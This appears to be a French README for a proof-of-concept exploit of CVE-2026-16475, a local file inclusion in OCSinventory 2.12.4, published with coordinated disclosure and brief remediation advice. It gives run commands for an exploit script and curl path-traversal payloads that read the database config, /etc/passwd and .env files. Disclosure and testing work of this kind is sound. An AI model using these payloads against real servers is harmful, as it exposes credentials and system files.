
Ceci est le dépôt officiel contenant le PoC de la CVE-2026-16475, une LFI dans OCSinventory 2.12.4.
Vulnérabilité d'inclusion de fichier local dans OCSinventory 2.12.4
ID CVE : CVE-2026-16475
Score CVSS : 6,9 (Moyen)
CWE : CWE-98 (Contrôle inapproprié du nom de fichier pour l'instruction Include/Require dans un programme PHP)
Version affectée : OCSinventory 2.12.4
État : Corrigé dans les dernières versions
Une vulnérabilité d'inclusion de fichier local (LFI) est présente dans le point de terminaison /ajax/teledeployoptions.php en raison d'un assainissement inapproprié du paramètre linkedoptions avant son utilisation dans une opération dynamique d'inclusion de fichier XML.
Ce point de terminaison est conçu pour charger des fichiers de configuration XML, mais ne valide pas correctement le paramètre linkedoptions, ce qui permet des attaques par traversée de chemin.
Un attaquant distant non authentifié peut exploiter cette vulnérabilité pour :
pip install -r requirements.txt
python3 exploit.py -u http://target.com -v
Options :
-u, --url - URL cible (obligatoire)-v, --verbose - Sortie détaillée-o, --output - Enregistrer les lectures réussies dans un fichierExemple :
python3 exploit.py -u http://ocs.example.com -v -o results.txt
./lfi_test.sh
Modifiez la variable BASE_URL dans le script :
BASE_URL="http://target.com/ajax/teledeployoptions.php"
# Read database config
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../dbconfig.inc"
# Read passwd file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../../../../../../etc/passwd"
# Read environment file
curl "http://target/ajax/teledeployoptions.php?os=test&linkedoptions=../../../.env"
Pour les utilisateurs :
Pour les développeurs :
basename() ou des fonctions similaires pour empêcher la traversée de cheminRemarque : CVE-2026-16475 est coordonné via INCIBE et peut ne pas encore être indexé dans NVD. Consultez la source INCIBE pour obtenir des informations faisant autorité.
Uniquement à des fins éducatives et de tests autorisés
Voir DISCLAIMER.md pour l'avis légal complet.
Adrián Ferrer Tarí
Divulgation responsable coordonnée via INCIBE